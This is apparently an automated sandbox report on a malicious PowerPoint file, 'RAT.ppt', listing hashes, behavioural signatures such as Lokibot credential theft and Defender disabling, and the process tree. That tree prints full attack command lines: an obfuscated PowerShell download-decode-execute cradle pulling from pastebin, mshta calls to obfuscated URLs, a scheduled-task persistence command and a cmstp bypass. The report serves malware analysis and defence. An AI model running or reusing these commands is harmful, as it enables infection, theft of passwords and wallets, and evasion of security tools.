Analysis
-
max time kernel
139s -
max time network
145s -
platform
windows7_x64 -
resource
win7v200722 -
submitted
18-08-2020 09:28
General
-
Target
RAT.ppt
-
Size
87KB
-
MD5
996d8c68ecfe98a2ce25c177927a90e0
-
SHA1
538d30afcc2d003f95c5f82714134957c8957159
-
SHA256
20b52843f8e11a925f7008ffe96848e846099130c0c23bd80b3f3c6ee726e234
-
SHA512
b9f2f992227632b86bcf2aad781738c2be173610bd41359fc581a89c7e4b44cac714385d28f7c967be2a31e8a3c33132aa6d5ced071d41c47aaa1f6c415cff1e
Malware Config
Extracted
https://pastebin.com/raw/aKjCtLDg
Signatures
-
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
-
Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Blocklisted process makes network request 9 IoCs
-
Adds Run key to start application 2 TTPs 6 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies Internet Explorer settings 1 TTPs 3 IoCs
-
Modifies registry class 64 IoCs
-
Modifies system certificate store 2 TTPs 3 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 42 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 15 IoCs
Processes
-
C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE"C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\RAT.ppt"1⤵
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" https://%909123id%909123id%909123id%909123id%[email protected]\kkkasriiiiii2rkoodd2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Adds Run key to start application
- Modifies Internet Explorer settings
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\mshta.exemshta https://%50%50%50%50%50%50%50%[email protected]\raw\1Kps24Kt3⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Modifies Internet Explorer settings
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 70 /tn "xestuohtiwfyl" /F /tr "\"mshta\"https://%20%[email protected]\raw\1Kps24Kt3⤵
- Creates scheduled task(s)
-
-
C:\Windows\System32\mshta.exemshta https://%50%50%50%50%50%50%50%[email protected]\raw\CkLFEYsw3⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell ((gp HKCU:\Software).Fucku)|IEX1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -nologo -WindowStyle Hidden $_Xpin = ((New-Object Net.WebClient).DowNloAdSTRiNg('h'+'t'+'t'+'p'+'s'+':'+'/'+'/'+'p'+'a'+'s'+'t'+'e'+'b'+'i'+'n'+'.'+'c'+'o'+'m'+'/'+'r'+'a'+'w'+'/aKjCtLDg'));$_Xpin=$_Xpin.replace('.','*!(@*#(!@#*').replace('*!(@*#(!@#*','0');$_Xpin = $_Xpin.ToCharArray();[Array]::Reverse($_Xpin);[byte[]]$_PMP = [System.Convert]::FromBase64String($_Xpin);$_1 = [System.Threading.Thread]::GetDomain().Load($_PMP);$_1.EntryPoint.invoke($S,$X)1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\system32\cmstp.exe"c:\windows\system32\cmstp.exe" /au C:\Windows\temp\2emtvo5b.inf2⤵
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
1348df3f0cbba9504d09b65f2a8e2907
SHA154e8b9aff55e7759267404bc51634a4c41485124
SHA25661e2fd85bd2471bf469f54e1f39aaa031aa9bc379feba3189ab551618736f732
SHA5129868932adba4f793428af27fa03427dd984af6ea54f323ddbd765180ce676139f62a10384381a1764f0837be2860aa987181f5aabe3543870352fea82f935877
-
MD5
7cabd6a5b31a9c3bc5e1b1b2adbc56c6
SHA1b5c8577d9a3a852585240d89d4f7510b77294268
SHA256fd5191ac63cf4ef151cf5e47ed59c65c04bcce331b373baadfcd105bf8a6fa7c
SHA51282672c167348a7c88c523bf8476827464691c8f35189a343fff9be99a445a6f4dd5274ed1c107efe55b320d42c5304ed75125943551b4a2f37e543815757dc02
-
MD5
ba71815438afb6b64d29adac08beeaca
SHA17f3160293346cb8fb62ee66c62a3a8305b63ab08
SHA25662bb1c0e743696751c63d6a80f68360f2b297877b49335b3605853dda73d0fb7
SHA512137c2694980e555876297f76bc73d89b7b4888227e1d8d8e5c0ba909b0dd4e055e105ee988d1dd2af9c3b96f5b4d1d0fa0e540291028a2ec8045502369b70784
-
MD5
313658d97704a72c8e972a1cac881606
SHA1597c78d178ed8c5d4122d1638381bec2f9e842aa
SHA256d12a83595628ead073a401854255352d918fe344ad273a0612454bacb7e27aa6
SHA512bd5d1a10f815574cae485316925ccc3d748f6a60ea7f9c2218303fe18d3cdbee9abc23264c3c43603cca48d96f93ba4017b6b030773fc41b5ef6f16e97856f1b
-
MD5
699d124286bebd9a314aa3d70842b33d
SHA1cf5126a94ed431867dd06b0f8596f17c18ecd593
SHA25691a4de806dc36e48212fd3f481968b6d203817241c3f6163afa0042cfb69606a
SHA512dd8bf53e0b7cc6f9515e3b86f1d0cb23dd7ee8ffd35719cafe496b07fbd9390382ab5c0469ffbbb8ac5282e3c79a6e4910eb0abad95ef905ce8f0c7d357fb89b
-
MD5
a3357980da81f07518b376c9f117133e
SHA1274a52d16db80c813a796beabcd7b30fa9431a7d
SHA256cc75b461b4ae1e50600e06fd64735567f1142e902ae0fa1efa648ab26c33a8af
SHA5125f049e74a8d8dec559cb2b2c9912e254242edd7b604ef9227f98ae8ca9b7b7a44bb559fc3513305477847007df14b6be028cce3b5359b222c8cccac54782e86a
-
MD5
2d62b1f4577e2af8b2119cacfa0d5b0a
SHA197be5bba7020c2c49c4262252223d7a1f58b6adc
SHA2562f3b2236abdccdddd83b4f8b60a4760ad26bd94a5015be017a21d52bc4b30a69
SHA512c6da4d8b9ac2beae8fa730625dba84b031afdd673616851a49a004def71d3294d4f94a02b07ff0a62c3325eac52cc6a01e7b19549ba177143a300363e7a3029d
-
MD5
76eb1a30cd4c26d349409d2c5a93e0d4
SHA1e1d3bd863a92aead5f88e96f5fdc62c0387beeda
SHA256b12a357038428e78b21ec2918339dddb6359949845a83c91209544249e8d62b5
SHA5124eb2fd9d8fc5bbc8141fd6c74e8ca30db867932c96a8a5c7063717f94935384a7a40c389d19f6c5cdf811761cc15fd6497031f64634d3ca3c93f548e63e2c211
-
MD5
bb1542822f20ac5dc4f41c4d82fe3b6d
SHA1febee277bbe18f8d3eb1a860ad687dff91615674
SHA2560a0722ae403ea83d0f67c1618f1c61544d925eec360a10eb32b1ad7e90bee998
SHA5125daa796bc83e36408ff08d7420dfe9dcc2d1096123a84cf2a5d5a1805586114e7fa0d642de59a2c284d02d13394d3bc938fb71ae5305a861375de12231b291c0
-
MD5
8635454e59df4d2b1a64b3812e4a9763
SHA198e8e9c448b540e6f97f8193e0c632ec55b801e8
SHA2566c0b177e77a24f6504a9116d24c32484b3d0dfc47c301127e356bdbe081a6b78
SHA512f906bb3e52d582e0597abea037f16f8e07772186b8d26a5fc7d64807bff638801c47a48134d8163ba0651a7f9022f4378cef02684e29e1aad6eb278019548a58
-
Filesize
16KB
-
Filesize
4KB
-
Filesize
1024KB
-
-
-
Filesize
2.5MB
-
-
Filesize
4KB
-
Filesize
28KB
-
Filesize
9.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
9.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
52KB
-
Filesize
4KB
-
Filesize
4KB
-
-
Filesize
140KB
-